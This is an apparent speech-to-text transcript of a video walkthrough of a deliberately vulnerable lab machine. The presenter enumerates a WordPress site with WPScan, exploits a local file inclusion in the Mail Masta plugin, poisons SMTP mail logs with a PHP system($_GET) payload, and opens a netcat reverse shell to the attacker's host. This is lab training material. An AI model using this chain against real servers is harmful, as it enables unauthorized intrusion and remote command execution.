Hello guys, welcome to a new video. In this video we are going to be doing the Synchronous Hub machine, which is this guy in Hub. And Synchronous, we are going to be I'm going to be able to teach you guys how to leverage an LFI exploitation into doing a telnet or into doing an SMTP log poisoning so we can get a reverse shell through LFI log poisoning, and getting a reverse shell through that. And you can just go ahead and download it from runhub.com. It's free, so go ahead and download it. And we need to update your host file after you add it to your virtual machine. It is good for virtual machine and also for VMware. Since I'm using a virtual machine, I already have it loaded. You can download it. It is a zip file, so you can go ahead and unzip it. And after you unzip it, you are going to get a file like this. So you have to do is just click on open with the VirtualBox and then just connect it to the same network as your Kali Linux machine. Then after that, you will need to go ahead and go into your Etsy host and add this Synchronous.log over here with the IP where it is connected to. All right. So you go sudo nano Etsy hosts with S host and add this entry right here for Synchronous. And then you want to go into this directory over here, which is the directory of the WordPress site. So there's a WordPress site, as you can see over here. And what we want to focus is, we want to run a WP scan, and a WP scan is a WordPress scanner. It can enumerate your WordPress targets really easily, and it's really powerful. So if you go into WP scan, and if you just go for the help to take a look at what you can do, there's a lot of options. You can do password attacks, user list, password, you can exclude usernames, you can do a plugin detection, plugin versions, enumeration, you can enumerate, you can go into WP content, WP plugins, you can do a lot of stuff. And on later videos, we're going to be focusing on WP scan so we can enumerate WordPress websites. But for this one, we just want to do a WP scan. And to specify the URL, you want to do, if you press enter over here, will tell you what you need to do. You need to add a URL. So WP scan URL. So in here, you want to put your URL. And then we want to do the enumerate and press enter. And this is going to start enumerating the website, right? You can see it's a little bit faster, right? Because this machine is directly connected to my Kali Linux, right? It's just one hop over. It is directly connected to my machine. You can see over here it's going to try to do, it goes to the URL, it pulls in what the server, so it does a detection on what the server is. It tries to do XML RPC, and it seems to be enabled, and it also gives you some references on what you can do with that. We can see it is definitely a WordPress, and we found the README over here. So if you go to this link, you are going to find the README. Open the new link. You can see over here README, everything about it, looking beautiful. Upload directory it's enabled over here, so WP uploads, you can go to that directory and you can look through it, see if you find anything interesting in here. Just some images of Synchronous. If we go back 2014, nothing in here. Site editor, so we just have some CSS over here. Nothing interesting over here. It goes and take a look at the WP cron, which is to be enabled. It tells you all about it, tells you the issues about it. Now it does the enumeration for the WordPress, which is 5.5.2.2, which is insecure because it was released in 2019. Okay, anything else? Now it goes to enumerate the themes. The one that it's using is the 2019, and it just tells you that it is outdated, but it didn't find any CVEs about it. And then it goes to enumerate the plugins, and it's just passive method. No plugins found. So it goes to enumerating the themes again. Nothing found, nothing found. For the DB exports, nothing found. It did find a user over here, as you can see. And there we go. So it did find a user, as you can see over here, which is admin. Okay, so nothing really in there. Let's go ahead and do another WP scan, but we want to focus on the plugin, so we can do enumerate P. So we can start enumerating the plugins. Okay. So what are we finding here? We found the readme.txt. We found the site editor, plugins, anything else in here? We have the mail master in here. And it is saying it's up to date. Let's go ahead and take a look at this. Anything else? Nothing else. So it seems to be, this one is it's not a common plugin to have the mail master in here. So I think this is what we want to look for. So let's go ahead and go exploit DB, or even we can just say, we can go into search exploit and search for mail master, and we can see over here for mail master .1, 1.0, it has some SQL injection, and it also has a local file inclusion, and it has a Python script, and it also has this text. So let's go ahead and go to the website and we can read that. Mail master, and we're going to be using this guy, local file inclusion. And over here it tells you that if we go into the name of the server, WP content, and you go over here, that's the password, we are going to be able to do that. So let's go over here, and there we go. So it is working. All right, so now we found an LFI, which is really cool. And we also saw that we have on this machine, we do have SMNT. So if we go into, let's do an nmap, a quick nmap of 10, 10, 10, 7, right? So we have SMTP over here open. So with this, what we can leverage is, this LFI, right? So we have local file inclusion. So now what we can do is we can poison the logs of the SMTP. And after we poison the logs of SMTP, what we can do is go and look at the logs of SMTP, or display it in here, and we are going to have code execution. So that's what we would like to do, right? So first, what I want to see is I want to make sure that I'm able to get into the mail. And there was also a user for SMTP that it was the Helios user. So that's how I was able to find the mail. After you do the SMB enumeration, you're going to find that there's a user called Helios in here. And you can see over here, we were able to pull the logs for it, right, for Helios via local file inclusion. So now if we go back over here and we connect to this port 25 via telnet, if we do, let's go ahead and clear this out. If we do telnet 10.10.10.7 25, so here we can see that we are connected to the ASMTP postfix. So this is doing mail. So now we are going to poison this by doing a basically we are going to inject a code execution here. So PHP system, and we are going to do the $. Oop, it didn't take it. Let me see. $, space, well, not space, we need to do a underscore right here, underscore get, and then in here we are going to put the F is fine, whatever you want to put in here. Let's go ahead and close this real quick. Let me make sure I got it right. So I got the PHP system, $, underscore get, and in there we're going to put the F, which is what we're going to be using for the code execution, and then we closed it and it looks good. Press enter. It says over here, error, the command is not recognized. But if you go over here in the alias mail, press enter. Let me see the source. Do we see any PHP in here? No, not yet. Okay, but what we can do is now we can do now a ampersand. Oops. We can do it like this, and then F, which was the one that we included, and then it's going to be equals to ID. And it didn't seem like it worked, so let me go to source, ID, nothing. How about if we do F, do IF config? Nothing, it didn't change. Do we have PHP in here? It didn't seem like it injected anything. Let me go ahead and close that connection. Quit. There we go. Clear. Did it do any log poisoning in here? I don't see it. Let me see if we do ID. Nothing. See WordPress. So it looks like the logs didn't poison the logs. So let's try it again. And this time I'm just going to use the C. There we go. Do it like this. Error command was not recognized. Refresh. And instead of F, we put a C. And nothing. The password you try, WPI, okay. Go ahead and view the source. Nothing about ID here, so it's not doing the poisoning the way it's supposed to. Trying to look for the logs. So we got return path over here from WordPress. Your new WordPress has successfully been installed. Here's the installation. Thank you. I'm trying to read all the logs. Helios. Local. I did a refresh and there's still nothing. Let me go ahead and remove this. So here's the username, which is the admin. Then the password you chose. So let's go ahead and just get a mail. Let's go ahead and try to send a mail. So we're going to sell mail from me. Okay, it took that RCPT to, we are going to send it to Helios, right? Because that's where we are able to see the logs. Okay, data. Okay, and now we can insert that again, and we are just going to choose this one as the data, and then that to end it. All right, so that is queued. Let's go ahead and go here, and we should be able to see that. There we go. So received, and we can see, oh, it is still working already. So let me go ahead and remove this. But we saw over here that it's actually working. Helios, so it is coming from me and delivered to Helios over here. So it was received by Helios. So we're now reading the Helios mail right now, right? So it received that email, and now it's in here. So we can see all the emails and all the logs in here. So now if we go, since we was delivered and we poison the logs, and we can say and here, and just put C equals to ID, we can see the ID of Helios over here. And we can say also, who am I? I'm Helios, okay? And who is the host name? Should be Symphonous. Awesome. Can we see ifconfig in here? ifconfig. Nope. IPA. Yep, you can see the IPA. Okay, so you can see all that. So we can clearly see that we have remote execution over here, right? We have remote execution. So what I look to do is always, so it looks better in Burp Suite. So I'm going to turn on Burp Suite, which you should have set up because we used it on the previous video. So now we are going to be sending this to Burp Suite. I just like using Burp Suite because it is better, right? And just in case something fails, we can quickly just send it to a repeater, like what we are going to be doing now, right? So we went to LFI, we found LFI, local file inclusion. From local file inclusion, we did a log poisoning, right? Or SMTP poisoning. And with SMTP poisoning, we were able to get remote code execution, right? Let's go ahead and proxy, intercept on, refresh. That's being sent to Burp Suite. In Burp Suite, I want to send it to repeater. So action send to repeater. Go to repeater. I love repeater. You gotta love repeater. All right, so in here, what I want to do is I want to send a shell back to myself. So we're going to say nc e bin bash, or bin, let's say bin sh, and we're going to send it to 10.10.10.5 at ports 1, 2, 3, 4. That's looking good, but before that, we need to go ahead and try to cache this. nc ovmp, right? So now let's go ahead and send this and see if we are able to get it. I sent it. 10.10.10.5. So nc e bin sh 10.10.10.5 at port 1, 2, 3, 4. Is that still my IP? 10.10.10.5. Yes, it is. Let's go ahead and send it again. Nothing worked. It didn't work. So we have nc bin sh e. Okay, so e. Yeah, I have that right. sh 10.10.10.5, and there's a port over here, but it's probably because it is URL encoded. Let's go ahead and turn this Burp Suite off. And let's go ahead and try to send it like this then. And you can see it over here. So I believe it's because Burp Suite is using doing the URL encoded. So you can script. There's a way to just turn off the URL encoded in here, and I'm not going to be looking at that right now, but that's part of what it is. Request attributes. Yeah, if you look in here, repeater URL encoded. Yeah, somewhere in here where you have to just turn it off. But yeah, we can see that we got the reverse shell. We do ID. Who am I? Host name. ls. There we go. So we can see all of this. Cat test.mail.php or _mail.php. Yep. Okay. ls pwd. That's where I'm at. cd ls cd into home, cd into alias, cd into the share. Oh, I killed it by accident. We can go ahead and start this again by listening on it, right? And just refreshing the website, and we can get the shell back again. cd into the home, alias, share. Here we go, the to-do and the research. Yep. All right, so this is it for this video, guys. Hopefully you guys enjoy this video. So we worked with the WordPress scanner. So we did a scan on WordPress, right? If you remember. So we did a little bit of WordPress work. We found it over here. We found this plugin that it was called the Mailmaster, and we saw the version. It said that it was up to date for some reason. We did a search on the web and we found that there was an LFI. We got into the LFI. From the LFI, we were able to include the mail for Helios, and in there we were able to do a log poisoning by connecting to the SMTP server via telnet. We basically drew like an email. We sent an email with the PHP poison in there, and after it got there, we were able to reload the file. We saw it there, and then since it was poisoned already, we were able to get remote code execution. So after we got remote code execution, what we did was we just sent a reverse shell back to our machine. So yeah, that's it for this video, guys. It was a great video. Thank you for watching like always, and I will see you on the next one.